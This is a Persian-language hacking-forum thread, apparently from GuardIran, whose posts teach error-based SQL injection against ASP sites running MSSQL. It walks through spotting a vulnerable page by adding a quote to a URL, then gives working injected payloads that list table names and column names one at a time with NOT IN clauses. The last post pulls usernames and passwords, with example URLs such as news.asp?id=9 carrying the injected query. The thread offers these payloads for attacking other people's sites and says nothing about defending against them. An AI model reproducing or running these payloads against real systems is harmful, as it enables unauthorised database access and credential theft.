رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

پست های پیشنهاد شده

با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . 

سطح : متوسط

تفاوت mssqli و mysql 

Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . 

Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد .

------------------------------------------------------------------------------------------------------------------------

تست آسیب پذیری ‌: 

به ادرس سایت ‘a را اضافه کنید . 

به این صورت : 

This is the hidden content, please

و با دریافت خطا یعنی سایت اسیب پذیر است .

------------------------------------------------------------------------------------------------------------------------

بیرون کشیدن اطلاعات اولیه :

روش اول : 

روش دوم : 

و به جای x می توانید این مقادیر  بزنید ‌:

user

db_name

@@servername

@@version

Host_@@version

Host_name

و....

برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید  .

امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم . 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

خب میریم سراغ مرحله ی بعدی یعنی بیرون کشیدن جداول (tables)

بیرون کشیدن تیبل ها (asp) : 

and 1=(select top 1 table_name from information_schema.tables)

مثال : 

Site.com/news.asp?id=5+and 1=(select top 1 table_name from information_schema.tables)

خروجی : sadra ( نام یک تیبل را نشان می دهد برای بیشتر باید محدود سازی کنید ‌)

محدود سازی تیبل ها (asp) و بدست اوردن تیبل های بعدی :

and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘table 1’,’table 2’,’table 3’,’table 4’,’table 5’……’))

به جای تیبل ۱ تیبل ۲ و ... بیاید اولین نام تیبلی که بدست اوردید را بزنید و بعد نام دوم و نام سوم و تا آخر .

یعنی خروجی دستور اول مثلا شد : sadra

پس می شود به این صورت : 

Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’))

خروجی : ali ، نام تیبل دوم را به شما نشان می دهد

و برای تیبل بعد :

Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’,’ali’))

خروجی : amir ، نام تیبل سوم 

و باز هم به همین صورت پیش می روید : 

Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’,’ali’,’amir’ ))

نکات مهم برای یادگیری بهتر : 

·      همینطور به همین صورت پیش می روید تا جایی که تیبل مهم را بدست بی آورید .

·      شما دارید می گوییید تیبلی را به من نمایش بده که نام آن در لیست من نیست (not in) .

·      تا جایی بروید تا دیگر چیزی به شما نمایش ندهد و آن موقع است که تمام تیبل ها را بیرون کشیدید .

-------------------

امید وارم از این آموزش راضی باشید و پست خوبی رو گذاشته باشم . 

در آموزش بعد می رویم سراغ بیرون کشیدن ستون ها . 

لینک به دیدگاه

در این قسمت همانطور که گفتم قصد دارم آموزش بیرون کشیدن ستون ها رو در سایت های asp بدهم . 

بیرون کشیدن ستون های یک تیبل :‌

and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem (

به جای تیبل نیم مهم نام تیبل مهم خود را بنویسید .  

و مثلا خروجی این است : ID و برای ستون بعد این کار را می کنید : 

and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem and column_name not in (‘ID’))

و مثل بیرون کشیدن تیبل دارید می گویید ستونی را به من نشان بده که در لیست نیست بعد مثلا زمانی که دستور بالا را زدید خروجی می شود : user

و برای ستون بعدی : 

and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem and column_name not in (‘ID’,’user’))

باز برای ستون های بعدی هم به همین صورت پیش می روید . 

بیشر نکات مثل بیرون کشیدن تیبل ها هست .

-------------------

امید وارم از این آموزش راضی باشید و پست خوبی رو گذاشته باشم . 

در آموزش بعد می رویم سراغ بیرون کشیدن اطلاعات ستون ها (username و password) 

لینک به دیدگاه

سلام خدمت دوستان عزیز در این  پست میریم سراغ بیرون کشیدن اطلاعات ستون ها (username و password

بیرون کشیدن اطلاعات ستون ها : 

+and+1=(select top 1 column name from table name )

به جای تیبل نیم نام تیبلی که می خواهید مثلا  __user و به جای ستون نیم نام ستون مورد نظر را بنویسید . 

مثال : 

Site.com/news.asp?id=9+and+1=(select top 1 username from __user)

لینک به دیدگاه

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• ایجاد مورد جدید...